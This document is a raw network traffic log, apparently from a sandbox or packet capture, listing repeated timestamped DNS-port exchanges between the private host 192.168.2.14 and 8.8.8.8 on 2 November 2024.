Nov 2, 2024 04:00:37.505647898 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:37.505662918 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:37.505716085 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:37.510730982 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:37.510754108 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:38.108083010 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:38.108196974 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:38.116391897 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:38.116441965 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:38.142487049 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:38.142842054 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:38.147344112 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:38.147557974 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:38.268630981 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:38.268646955 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:38.268729925 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:38.268759012 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:39.277672052 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:39.277971029 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:39.282587051 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:39.282747984 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:39.403500080 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:39.403793097 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:39.616489887 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:39.616575003 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:40.624275923 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:40.624317884 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:40.630326986 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:40.630345106 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:40.751677036 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:40.751797915 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:41.764516115 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:41.764566898 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:41.770912886 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:41.771733046 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:41.892328024 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:41.892532110 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:41.892736912 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:41.892792940 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:42.902118921 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:42.902251005 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:42.907128096 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:42.907144070 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:43.028337955 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:43.028434038 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:44.037980080 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:44.038228989 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:44.042910099 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:44.042949915 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:44.166974068 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:44.167160988 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:45.176632881 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:45.176671982 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:45.181715965 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:45.181735039 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:45.303093910 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:45.303206921 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:46.310878992 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:46.311356068 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:46.315885067 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:46.316140890 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:46.437076092 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:46.437175035 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:46.728080034 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:46.728255987 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:47.736628056 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:47.736679077 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:47.741589069 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:47.741605043 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:47.862997055 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:47.863173008 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:48.872406006 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:48.872487068 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:48.877269030 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:48.877410889 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:48.998265028 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:48.998311043 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:48.998502970 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:48.998502970 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:50.009536028 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:50.009951115 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:50.015829086 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:50.015840054 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:50.135689974 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:50.135729074 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:50.135786057 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:50.135786057 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:51.146131039 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:51.148260117 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:51.150984049 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:51.153040886 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:51.272775888 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:51.272857904 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:51.274573088 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:51.274622917 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:52.283636093 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:52.283756971 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:52.288707972 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:52.288717985 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:52.409753084 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:52.409805059 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:52.409842014 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:52.409842014 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:53.419107914 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:53.419751883 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:53.424129963 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:53.424595118 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:53.545243025 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:53.545396090 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:53.545401096 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:53.545449972 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:54.558147907 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:54.559529066 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:54.563060045 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:54.564373016 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:54.684106112 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:54.684197903 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:54.685323000 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:54.685410023 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:55.697817087 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:55.698004007 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:55.703943968 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:55.703954935 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:55.825119019 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:55.825237036 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:56.835278988 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:56.835416079 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:56.840079069 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:56.840116978 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:56.961323977 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:56.961517096 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:57.973895073 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:57.973954916 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:57.978782892 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:57.978795052 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:58.099843979 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:58.099858046 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:58.099977016 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:58.099977016 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:59.113055944 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:59.113126040 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:59.118024111 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:59.118035078 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:59.239089966 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:59.239168882 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:00:59.239183903 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:00:59.239272118 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:00.248847008 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:00.248920918 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:00.253679037 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:00.253715992 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:00.374859095 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:00.374876022 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:00.374978065 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:00.374978065 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:01.387742043 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:01.387798071 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:01.392627001 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:01.392657995 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:01.513859034 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:01.513875961 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:01.513967991 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:01.513967991 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:02.525871038 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:02.526618958 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:02.530761957 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:02.531372070 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:02.651937962 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:02.651990891 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:02.652398109 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:02.652441978 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:03.662988901 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:03.663075924 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:03.667879105 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:03.667892933 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:03.788971901 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:03.788979053 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:03.789247036 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:03.789247036 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:04.799942970 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:04.799942970 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:04.804858923 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:04.804886103 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:04.926246881 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:04.926423073 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:05.936368942 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:05.936476946 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:05.941312075 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:05.941325903 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:06.062551975 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:06.062829018 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:07.071021080 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:07.071223974 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:07.076092005 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:07.076107025 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:07.197307110 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:07.197596073 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:08.206212044 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:08.206518888 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:08.211261988 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:08.211386919 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:08.332613945 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:08.332958937 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:09.341998100 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:09.342025042 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:09.346749067 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:09.346764088 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:09.468859911 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:09.468951941 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:10.480093956 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:10.480132103 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:10.485064983 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:10.485105038 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:10.614753008 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:10.614767075 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:10.615127087 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:10.615127087 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:11.626684904 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:11.626950026 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:11.631581068 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:11.631738901 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:11.752557039 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:11.752707958 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:11.752808094 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:11.752808094 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:12.762295008 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:12.762515068 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:12.768500090 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:12.768639088 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:12.888523102 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:12.888632059 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:12.889204025 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:12.889223099 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:12.889260054 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:12.889421940 CET	45164	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:12.895720959 CET	53	45164	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:13.898607969 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:13.903422117 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:13.903525114 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:13.903525114 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:13.903525114 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:13.908411980 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:13.908423901 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:14.511070013 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:14.511440039 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:14.516280890 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:14.516350031 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:15.522964001 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:15.523000956 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:15.527884007 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:15.527914047 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:15.656006098 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:15.656044960 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:15.656244993 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:15.656244993 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:16.667975903 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:16.668164968 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:16.672725916 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:16.672890902 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:16.794708967 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:16.794783115 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:16.794797897 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:16.794828892 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:17.808406115 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:17.808696985 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:17.813230038 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:17.813452005 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:17.935583115 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:17.935600996 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:17.935781002 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:17.935781002 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:18.954078913 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:18.954864025 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:18.959939003 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:18.960117102 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:19.082549095 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:19.082711935 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:19.292757034 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:19.292954922 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:20.303839922 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:20.305394888 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:20.308685064 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:20.310142040 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:20.430886030 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:20.431268930 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:20.432157040 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:20.432614088 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:21.442405939 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:21.442620993 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:21.447263002 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:21.447355986 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:21.569401979 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:21.569593906 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:21.569616079 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:21.569663048 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:22.580471039 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:22.580780029 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:22.586215973 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:22.586736917 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:22.709606886 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:22.709719896 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:22.709724903 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:22.709803104 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:23.721712112 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:23.721864939 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:23.726528883 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:23.726710081 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:23.848697901 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:23.848973989 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:24.861567020 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:24.863017082 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:24.866508961 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:24.867978096 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:24.988990068 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:24.989229918 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:24.990205050 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:24.990262032 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:26.003990889 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:26.004328012 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:26.008811951 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:26.009048939 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:26.131078959 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:26.131176949 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:26.131179094 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:26.131236076 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:27.145122051 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:27.147003889 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:27.151793957 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:27.151849031 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:27.274579048 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:27.274693966 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:27.275887966 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:27.276021957 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:28.288259029 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:28.289227962 CET	45228	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:01:28.293283939 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:28.294034958 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:28.419398069 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:28.419416904 CET	53	45228	8.8.8.8	192.168.2.14
Nov 2, 2024 04:01:28.419559956 CET	45228	53	192.168.2.14	8.8.8.8
